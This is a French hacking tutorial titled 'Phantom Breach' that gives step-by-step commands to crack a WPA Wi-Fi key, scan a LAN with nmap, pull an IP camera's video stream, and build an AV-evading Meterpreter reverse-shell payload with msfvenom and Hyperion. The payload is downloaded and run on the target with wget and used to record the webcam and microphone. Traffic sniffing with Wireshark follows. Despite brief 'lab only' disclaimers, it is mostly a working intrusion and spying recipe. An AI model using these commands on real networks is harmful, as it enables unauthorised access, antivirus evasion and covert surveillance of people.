👻 Phantom Breach

"Infiltration Wi-Fi, espionnage, et interception – lab only, éthique avant tout."

🧠 C’est quoi ce délire ?

*Phantom Breach* te guide dans une infiltration Wi-Fi en environnement contrôlé : crack WPA, cartographie LAN, exploitation d’appareils connectés, et interception de comms. Avec Hyperion pour l’obfuscation, c’est du hacking furtif et pro – mais toujours 100% éthique et lab only, hein, mon gars ! 😎

🛠️ Prérequis

⚠️ Avertissement légal

Ce tuto est pour des tests en lab sur TON réseau ou avec autorisation explicite. Tout usage illégal est hors jeu – reste clean !

🔓 Étape 1 : Pénétration Wi-Fi avec aircrack-ng

Objectif : Récupérer la clé WPA/WPA2 pour squatter le LAN.

Procédure

  1. ID interface :
    iwconfig
    → wlan0.
  2. Mode monitor :
    airmon-ng start wlan0
    → wlan0mon.
  3. Scan réseaux :
    airodump-ng wlan0mon
    → BSSID (ex. 00:11:22:33:44:55), canal 6, ESSID TestLab.
  4. Capture handshake :
    airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon
  5. Forcer handshake :
    aireplay-ng -0 10 -a 00:11:22:33:44:55 wlan0mon
    → “WPA handshake” dans capture-01.cap.
  6. Crack clé :
    aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 00:11:22:33:44:55 capture-01.cap
    → Clé : SecretKey123.
  7. Connexion :
    nmcli dev wifi connect TestLab password SecretKey123

Analyse : Le handshake, c’est l’échange d’authentification capturé. Avec la clé, t’es dans le LAN comme un ghost légit !

🗺️ Étape 2 : Cartographie LAN avec nmap

Objectif : Repérer les cibles et leurs failles.

Procédure

  1. IP locale :
    ifconfig wlan0
    → 192.168.1.10, plage 192.168.1.0/24.
  2. Découverte hôtes :
    nmap -sn 192.168.1.0/24
    → 192.168.1.100 (PC), 192.168.1.101 (caméra).
  3. Scan ports :
    nmap -p- -sV 192.168.1.100
    → 80/http, 445/smb, 554/rtsp.

Analyse : RTSP = caméra, SMB/HTTP = PC vulnérable. T’as une carte des cibles, maestro !

💥 Étape 3 : Exploitation avec Metasploit & Hyperion

Objectif : Piquer des flux vidéo/audio avec obfuscation.

3.1 : Caméra IP (RTSP)

  1. Lancer Metasploit :
    msfconsole
  2. Module RTSP :
    search rtsp
    use auxiliary/scanner/rtsp/vlc_bypass
    set RHOSTS 192.168.1.101
    set RPORT 554
    run
    → Accès au flux si vulnérable.
  3. Récup flux :
    ffmpeg -i rtsp://192.168.1.101:554/live -f mpegts udp://192.168.1.100:1234
    → VLC : udp://@:1234.

Analyse : Une caméra sans auth forte = jackpot vidéo en live !

3.2 : PC avec Meterpreter obfusqué

  1. Payload brut :
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o phantom_raw.exe
  2. Hyperion :
    git clone https://github.com/nullsecuritynet/tools.git
    cd tools/hyperion
    make
    ./hyperion phantom_raw.exe phantom.exe
    → Payload chiffré.
  3. Serveur :
    python3 -m http.server 8000
  4. Listener :
    msfconsole
    use multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.100
    set LPORT 4444
    run
  5. Déploiement (lab) : Sur cible :
    wget http://192.168.1.100:8000/phantom.exe && phantom.exe
  6. Exploitation :
    webcam_stream
    record_mic -d 5
    download webcam_* mic_*

Analyse : Hyperion dodge les AV, Meterpreter te donne webcam et micro – furtivité max !

📡 Étape 4 : Interception avec Wireshark

Objectif : Sniffer le trafic LAN.

Procédure

  1. Lancer Wireshark :
    wireshark &
  2. Interface : wlan0.
  3. Filtres :
    • HTTP : http.request
    • TLS : tls.handshake
    • IoT : udp ou tcp.port == 80
  4. Analyse : Données en clair (ex. HTTP), métadonnées TLS (ex. api.whatsapp.com).

Analyse : TLS bloque le contenu, mais les métadonnées parlent – IoT en clair = bonus !

🧾 Disclaimer

⚠️ Lab only! Usage non autorisé = illégal. Fais gaffe, pas de garantie !

Créateur : Platon-y pour PCTamalou.